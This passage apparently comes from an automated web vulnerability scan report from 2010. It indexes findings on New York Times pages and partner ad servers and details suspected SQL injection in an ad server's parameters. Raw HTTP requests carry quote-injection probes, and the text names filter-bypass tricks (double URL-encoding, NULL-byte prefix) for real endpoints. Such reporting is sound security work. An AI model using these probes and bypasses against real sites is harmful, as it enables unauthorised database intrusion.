3.179. http://opinionator.blogs.nytimes.com/category/allison-arieff [REST URL parameter 2]
3.180. http://opinionator.blogs.nytimes.com/category/allison-arieff/feed/ [REST URL parameter 3]
3.181. http://opinionator.blogs.nytimes.com/category/allison-arieff/page/2/ [REST URL parameter 3]
3.182. http://opinionator.blogs.nytimes.com/category/dick-cavett [REST URL parameter 2]
3.183. http://opinionator.blogs.nytimes.com/category/dick-cavett/feed/ [REST URL parameter 3]
3.184. http://opinionator.blogs.nytimes.com/category/dick-cavett/page/2/ [REST URL parameter 3]
3.185. http://opinionator.blogs.nytimes.com/category/disunion [REST URL parameter 2]
3.186. http://opinionator.blogs.nytimes.com/category/disunion/ [REST URL parameter 2]
3.187. http://opinionator.blogs.nytimes.com/category/disunion/feed/ [REST URL parameter 3]
3.188. http://opinionator.blogs.nytimes.com/category/disunion/page/2/ [REST URL parameter 3]
3.189. http://opinionator.blogs.nytimes.com/category/errol-morris [REST URL parameter 2]
3.190. http://opinionator.blogs.nytimes.com/category/errol-morris/feed/ [REST URL parameter 3]
3.191. http://opinionator.blogs.nytimes.com/category/errol-morris/page/2/ [REST URL parameter 3]
3.192. http://opinionator.blogs.nytimes.com/category/fixes [REST URL parameter 2]
3.193. http://opinionator.blogs.nytimes.com/category/fixes/ [REST URL parameter 2]
3.194. http://opinionator.blogs.nytimes.com/category/fixes/feed/ [REST URL parameter 3]
3.195. http://opinionator.blogs.nytimes.com/category/fixes/page/2/ [REST URL parameter 3]
3.196. http://opinionator.blogs.nytimes.com/category/home-fires [REST URL parameter 2]
3.197. http://opinionator.blogs.nytimes.com/category/home-fires/ [REST URL parameter 2]
3.198. http://opinionator.blogs.nytimes.com/category/home-fires/feed/ [REST URL parameter 3]
3.199. http://opinionator.blogs.nytimes.com/category/home-fires/page/2/ [REST URL parameter 3]
3.200. http://opinionator.blogs.nytimes.com/category/linda-greenhouse [REST URL parameter 2]
3.201. http://opinionator.blogs.nytimes.com/category/linda-greenhouse/ [REST URL parameter 2]
3.202. http://opinionator.blogs.nytimes.com/category/linda-greenhouse/feed/ [REST URL parameter 3]
3.203. http://opinionator.blogs.nytimes.com/category/linda-greenhouse/page/2/ [REST URL parameter 3]
3.204. http://opinionator.blogs.nytimes.com/category/line-by-line [REST URL parameter 2]
3.205. http://opinionator.blogs.nytimes.com/category/line-by-line/ [REST URL parameter 2]
3.206. http://opinionator.blogs.nytimes.com/category/line-by-line/feed/ [REST URL parameter 3]
3.207. http://opinionator.blogs.nytimes.com/category/line-by-line/page/2/ [REST URL parameter 3]
3.208. http://opinionator.blogs.nytimes.com/category/living-rooms [REST URL parameter 2]
3.209. http://opinionator.blogs.nytimes.com/category/living-rooms/feed/ [REST URL parameter 3]
3.210. http://opinionator.blogs.nytimes.com/category/living-rooms/page/2/ [REST URL parameter 3]
3.211. http://opinionator.blogs.nytimes.com/category/peter-orszag [REST URL parameter 2]
3.212. http://opinionator.blogs.nytimes.com/category/peter-orszag/ [REST URL parameter 2]
3.213. http://opinionator.blogs.nytimes.com/category/peter-orszag/feed/ [REST URL parameter 3]
3.214. http://opinionator.blogs.nytimes.com/category/peter-orszag/page/2/ [REST URL parameter 3]
3.215. http://opinionator.blogs.nytimes.com/category/robert-wright [REST URL parameter 2]
3.216. http://opinionator.blogs.nytimes.com/category/robert-wright/ [REST URL parameter 2]
3.217. http://opinionator.blogs.nytimes.com/category/robert-wright/feed/ [REST URL parameter 3]
3.218. http://opinionator.blogs.nytimes.com/category/robert-wright/page/2/ [REST URL parameter 3]
3.219. http://opinionator.blogs.nytimes.com/category/stanley-fish [REST URL parameter 2]
3.220. http://opinionator.blogs.nytimes.com/category/stanley-fish/ [REST URL parameter 2]
3.221. http://opinionator.blogs.nytimes.com/category/stanley-fish/feed/ [REST URL parameter 3]
3.222. http://opinionator.blogs.nytimes.com/category/stanley-fish/page/2/ [REST URL parameter 3]
3.223. http://opinionator.blogs.nytimes.com/category/the-conversation [REST URL parameter 2]
3.224. http://opinionator.blogs.nytimes.com/category/the-conversation/ [REST URL parameter 2]
3.225. http://opinionator.blogs.nytimes.com/category/the-conversation/feed/ [REST URL parameter 3]
3.226. http://opinionator.blogs.nytimes.com/category/the-conversation/page/2/ [REST URL parameter 3]
3.227. http://opinionator.blogs.nytimes.com/category/the-score [REST URL parameter 2]
3.228. http://opinionator.blogs.nytimes.com/category/the-score/feed/ [REST URL parameter 3]
3.229. http://opinionator.blogs.nytimes.com/category/the-score/page/2/ [REST URL parameter 3]
3.230. http://opinionator.blogs.nytimes.com/category/the-stone [REST URL parameter 2]
3.231. http://opinionator.blogs.nytimes.com/category/the-stone/ [REST URL parameter 2]
3.232. http://opinionator.blogs.nytimes.com/category/the-stone/feed/ [REST URL parameter 3]
3.233. http://opinionator.blogs.nytimes.com/category/the-stone/page/2/ [REST URL parameter 3]
3.234. http://opinionator.blogs.nytimes.com/category/the-thread [REST URL parameter 2]
3.235. http://opinionator.blogs.nytimes.com/category/the-thread/ [REST URL parameter 2]
3.236. http://opinionator.blogs.nytimes.com/category/the-thread/feed/ [REST URL parameter 3]
3.237. http://opinionator.blogs.nytimes.com/category/the-thread/page/2/ [REST URL parameter 3]
3.238. http://opinionator.blogs.nytimes.com/category/timothy-egan [REST URL parameter 2]
3.239. http://opinionator.blogs.nytimes.com/category/timothy-egan/ [REST URL parameter 2]
3.240. http://opinionator.blogs.nytimes.com/category/timothy-egan/feed/ [REST URL parameter 3]
3.241. http://opinionator.blogs.nytimes.com/category/timothy-egan/page/2/ [REST URL parameter 3]
3.242. http://opinionator.blogs.nytimes.com/category/townie [REST URL parameter 2]
3.243. http://opinionator.blogs.nytimes.com/category/townie/page/2/ [REST URL parameter 3]
3.244. http://opinionator.blogs.nytimes.com/category/townies/ [REST URL parameter 2]
3.245. http://opinionator.blogs.nytimes.com/category/townies/feed [REST URL parameter 3]
3.246. http://opinionator.blogs.nytimes.com/category/william-d-cohan [REST URL parameter 2]
3.247. http://opinionator.blogs.nytimes.com/category/william-d-cohan/ [REST URL parameter 2]
3.248. http://opinionator.blogs.nytimes.com/category/william-d-cohan/feed/ [REST URL parameter 3]
3.249. http://opinionator.blogs.nytimes.com/category/william-d-cohan/page/2/ [REST URL parameter 3]
3.250. http://opinionator.blogs.nytimes.com/tag/alan-simpson/ [REST URL parameter 2]
3.251. http://opinionator.blogs.nytimes.com/tag/budget/ [REST URL parameter 2]
3.252. http://opinionator.blogs.nytimes.com/tag/erskine-bowles/ [REST URL parameter 2]
3.253. http://opinionator.blogs.nytimes.com/tag/federal-deficit/ [REST URL parameter 2]
3.254. http://opinionator.blogs.nytimes.com/tag/health-care-reform/ [REST URL parameter 2]
3.255. http://opinionator.blogs.nytimes.com/tag/social-security/ [REST URL parameter 2]
3.256. http://opinionator.blogs.nytimes.com/tag/taxes/ [REST URL parameter 2]
3.257. https://placead.nytimes.com/default.asp [CategoryID parameter]
3.258. http://prescriptions.blogs.nytimes.com/2010/11/12/group-says-camel-packs-lure-the-young/ [src parameter]
3.259. http://scientistatwork.blogs.nytimes.com/2010/11/12/drought-in-the-amazon-up-close-and-personal/ [src parameter]
3.260. http://scientistatwork.blogs.nytimes.com/2010/11/12/in-the-remote-pacific-glimpses-of-pristine-corals/ [src parameter]
3.261. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 1]
3.262. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 1]
3.263. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 2]
3.264. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 2]
3.265. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 2]
3.266. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 3]
3.267. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 3]
3.268. http://theater.nytimes.com/2010/11/11/theater/reviews/11play.html [name of an arbitrarily supplied request parameter]
3.269. http://theater.nytimes.com/2010/11/11/theater/reviews/11play.html [ref parameter]
3.270. http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html [hpw parameter]
3.271. http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html [name of an arbitrarily supplied request parameter]
3.272. http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html [ref parameter]
3.273. http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html [src parameter]
3.274. http://theater.nytimes.com/2010/11/12/theater/reviews/12radio.html [name of an arbitrarily supplied request parameter]
3.275. http://theater.nytimes.com/2010/11/12/theater/reviews/12radio.html [ref parameter]
3.276. http://theater.nytimes.com/2010/11/12/theater/reviews/12throne.html [hpw parameter]
3.277. http://theater.nytimes.com/2010/11/12/theater/reviews/12throne.html [name of an arbitrarily supplied request parameter]
3.278. http://theater.nytimes.com/2010/11/12/theater/reviews/12throne.html [ref parameter]
3.279. http://theater.nytimes.com/2010/11/13/theater/reviews/13notes.html [hpw parameter]
3.280. http://theater.nytimes.com/2010/11/13/theater/reviews/13notes.html [name of an arbitrarily supplied request parameter]
3.281. http://theater.nytimes.com/2010/11/13/theater/reviews/13notes.html [src parameter]
3.282. http://thecaucus.blogs.nytimes.com/2010/11/12/gov-perry-to-lead-republican-governors/ [src parameter]
3.283. http://thequad.blogs.nytimes.com/2010/11/12/quad-qa-sienas-ryan-rossiter/ [src parameter]
3.284. http://thequad.blogs.nytimes.com/2010/11/12/weekly-pick-em-crunch-time-in-the-sec/ [src parameter]
3.285. http://tmagazine.blogs.nytimes.com/2010/11/12/look-of-the-moment-v-b-s-tangerine-dream/ [src parameter]
3.286. http://topics.blogs.nytimes.com/tag/after-deadline/ [REST URL parameter 2]
3.287. http://topics.blogs.nytimes.com/tag/bees/ [REST URL parameter 2]
3.288. http://topics.blogs.nytimes.com/tag/coffee/ [REST URL parameter 2]
3.289. http://topics.blogs.nytimes.com/tag/composting/ [REST URL parameter 2]
3.290. http://trc.taboolasyndication.com/dispatch [item-type parameter]
3.291. http://trc.taboolasyndication.com/dispatch [list-id parameter]
3.292. http://trc.taboolasyndication.com/dispatch [publisher parameter]
3.293. http://us.blackberry.com/smartphones/blackberrytorch.jsp [REST URL parameter 2]
3.294. http://video.nytimes.com/ [name of an arbitrarily supplied request parameter]
3.295. http://video.nytimes.com/ [src parameter]
3.296. http://video.nytimes.com/video/2010/10/15/dining/1248068993504/quick-preserved-lemons.html [name of an arbitrarily supplied request parameter]
3.297. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 2]
3.298. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 3]
3.299. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 4]
3.300. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 5]
3.301. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 5]
3.302. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 5]
3.303. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [name of an arbitrarily supplied request parameter]
3.304. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 2]
3.305. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 3]
3.306. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 4]
3.307. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 5]
3.308. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 5]
3.309. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 5]
3.310. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [name of an arbitrarily supplied request parameter]
3.311. http://video.nytimes.com/video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html [REST URL parameter 2]
3.312. http://video.nytimes.com/video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html [REST URL parameter 3]
3.313. http://video.nytimes.com/video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html [name of an arbitrarily supplied request parameter]
3.314. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 2]
3.315. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 3]
3.316. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 4]
3.317. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 5]
3.318. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 5]
3.319. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 5]
3.320. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 6]
3.321. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 6]
3.322. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 6]
3.323. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [name of an arbitrarily supplied request parameter]
3.324. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 2]
3.325. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 3]
3.326. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 4]
3.327. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 5]
3.328. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 5]
3.329. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 5]
3.330. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [name of an arbitrarily supplied request parameter]
3.331. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 2]
3.332. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 3]
3.333. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 4]
3.334. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 5]
3.335. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 5]
3.336. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 5]
3.337. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 6]
3.338. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 7]
3.339. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [name of an arbitrarily supplied request parameter]
3.340. http://video.nytimes.com/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html [REST URL parameter 2]
3.341. http://video.nytimes.com/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html [REST URL parameter 3]
3.342. http://video.nytimes.com/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html [REST URL parameter 4]
3.343. http://video.nytimes.com/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html [name of an arbitrarily supplied request parameter]
3.344. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 2]
3.345. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 3]
3.346. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 4]
3.347. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 5]
3.348. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 5]
3.349. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 5]
3.350. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 6]
3.351. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 7]
3.352. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [name of an arbitrarily supplied request parameter]
3.353. http://video.nytimes.com/video/2010/11/08/business/media/1248069229412/chinese-animation-.html [REST URL parameter 2]
3.354. http://video.nytimes.com/video/2010/11/08/business/media/1248069229412/chinese-animation-.html [REST URL parameter 3]
3.355. http://video.nytimes.com/video/2010/11/08/business/media/1248069229412/chinese-animation-.html [REST URL parameter 4]
3.356. http://video.nytimes.com/video/2010/11/08/business/media/1248069229412/chinese-animation-.html [name of an arbitrarily supplied request parameter]
3.357. http://video.nytimes.com/video/2010/11/08/world/1248069302724/timescast-november-8-2010.html [REST URL parameter 2]
3.358. http://video.nytimes.com/video/2010/11/08/world/1248069302724/timescast-november-8-2010.html [name of an arbitrarily supplied request parameter]
3.359. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 2]
3.360. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 3]
3.361. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 4]
3.362. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 5]
3.363. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 5]
3.364. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 5]
3.365. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [name of an arbitrarily supplied request parameter]
3.366. http://video.nytimes.com/video/2010/11/09/business/1248069304600/fed-move-not-enough.html [name of an arbitrarily supplied request parameter]
3.367. http://video.nytimes.com/video/2010/11/11/dining/1248069312941/tipsy-diaries-beans-with-booze.html [name of an arbitrarily supplied request parameter]
3.368. http://video.nytimes.com/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html [REST URL parameter 2]
3.369. http://video.nytimes.com/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html [REST URL parameter 3]
3.370. http://video.nytimes.com/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html [REST URL parameter 4]
3.371. http://video.nytimes.com/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html [name of an arbitrarily supplied request parameter]
3.372. http://video.nytimes.com/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html [REST URL parameter 2]
3.373. http://video.nytimes.com/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html [REST URL parameter 3]
3.374. http://video.nytimes.com/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html [REST URL parameter 4]
3.375. http://video.nytimes.com/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html [name of an arbitrarily supplied request parameter]
3.376. http://video.nytimes.com/video/2010/11/12/multimedia/1248069223837/bayous-quagmire-for-goldman.html [name of an arbitrarily supplied request parameter]
3.377. http://video.nytimes.com/video/2010/11/12/world/1248069321921/timescast-november-12-2010.html [name of an arbitrarily supplied request parameter]
3.378. http://video.on.nytimes.com/ [name of an arbitrarily supplied request parameter]
3.379. http://homedelivery.nytimes.com/ [Referer HTTP header]
3.380. http://ipboutiquehotel.com/ [Referer HTTP header]
4. Open redirection
1. SQL injection
next
There are 6 instances of this issue:
Issue background
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:- One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
- Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
1.1. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [ad parameter]
next
Summary
Severity: |
High |
Confidence: |
Tentative |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N5739.NYTimes.com/B4990972.8 |
Issue detail
The ad parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ad parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ad request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt%2527&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1 Accept: */* Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response 1
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:49:54 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5579
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 03 16:27:21 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}} else if (window.ActiveXObject && window.execScript){ window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal ...[SNIP]...
|
Request 2
GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt%2527%2527&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1 Accept: */* Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response 2
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:49:55 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 434
document.write('<a target="_top" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/0/%2a/h;232242348;1-0;0;56070716;3454-728/90;39189060/39206847/1;;~okv=;pc=nyt148363_248885;;~sscs=%3fhttp://us.black ...[SNIP]...
|
1.2. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [camp parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Tentative |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N5739.NYTimes.com/B4990972.8 |
Issue detail
The camp parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the camp parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2%00'&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1 Accept: */* Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response 1
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:49:40 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5579
